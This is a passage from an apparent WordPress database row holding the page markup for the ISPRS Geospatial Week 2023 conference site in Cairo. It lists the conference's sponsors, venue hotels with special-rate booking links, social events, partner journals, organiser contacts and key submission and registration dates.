(5280,1,'2023-08-16 03:02:34','2023-08-16 03:02:34','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154846958{margin-top: 75px !important;margin-right: -50px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692154802942{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" 